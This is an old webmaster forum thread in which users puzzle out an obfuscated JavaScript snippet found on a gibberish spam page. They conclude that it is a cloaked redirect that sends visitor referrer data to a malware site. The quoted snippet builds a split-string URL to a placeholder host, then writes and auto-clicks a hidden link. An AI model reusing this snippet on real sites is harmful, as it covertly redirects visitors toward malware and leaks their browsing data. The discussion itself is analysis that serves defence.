What the Heck is This?

Forum Moderators: DixonJones

Message Too Old, No Replies

What the Heck is This?

I KNOW It's Nefarious, but Can't Figure Out How.

cmarshall

3:49 am on Sep 2, 2007 (gmt 0)

I came across the Web page full of nonsense (at a .cn TLD).

It had a JavaScript include, and that file had something like this:

exgo='h' + 't' + 't' + 'p://' + 'example' + '.com/in.p' + 'hp?id=2&ul=1&ref_s='+encodeURIComponent(document.referrer)+'&ref_d='+encodeURIComponent(document.URL);
document.write('<a href="'+exgo+'" id="xyz" target="_self" style=display:none>click here</a>');window.open("", "_self");
document.getElementById("xyz").click();

It LOOKS like harmless tracking code, but the deliberate URL obfuscation tells me it's naughty.

It wasn't "example.com". It was a .name domain.

Anyone have any explanation?

nowpc

10:21 pm on Sep 3, 2007 (gmt 0)

You probably know that the code is creating a link on the page that is not visible to the user and is autoscriptically clicked, opening a popup. I'm not sure if all that obfuscation will hide the link from pop-up blockers - I wouldn't have thought so. It'll hide it from spiders, though, possibly preventing the page losing SE value due to poor site linking. That's all I got. :)

cmarshall

10:46 pm on Sep 3, 2007 (gmt 0)

Yeah, that's what the code says. It didn't work on my browser, though. I have FF2/Mac and I didn't even get a blocked popup warning; just a page full of gibberish.

nowpc

10:58 pm on Sep 3, 2007 (gmt 0)

Hmm, well looking at it a bit closer, the script isn't writing to a popup, it's writing to the existing page. The style rule won't work because it's not in quotes. Now I'm wondering if it's trying to crash the browser by filling the page with gibberish forever - but invisibly, if the style rule worked.

cmarshall

12:00 am on Sep 4, 2007 (gmt 0)

I think I just figured it out.

It generates a link back to the site that is not "example.com." That site contains a "Funny Videos" page. I suspect it's a malware distributor.

nowpc

8:45 am on Sep 4, 2007 (gmt 0)

Yes, looks like you've got it. It's an attempt at a cloaked redirect isn't it, but a bust one because it's bad code.

cmarshall

5:01 pm on Sep 4, 2007 (gmt 0)

Okay, now it clicks into place.

The page full of gibberish is a "Google magnet." It pushes the page high (it was one of the first hits in a search -I can't remember what for). The absence of valid URIs in the page means that Google won't think it's a link farm page, and won't be able to match the URI against a blacklist.

The JS is supposed to force a redirect to their naughty page, when you click on the link that shows up in Google.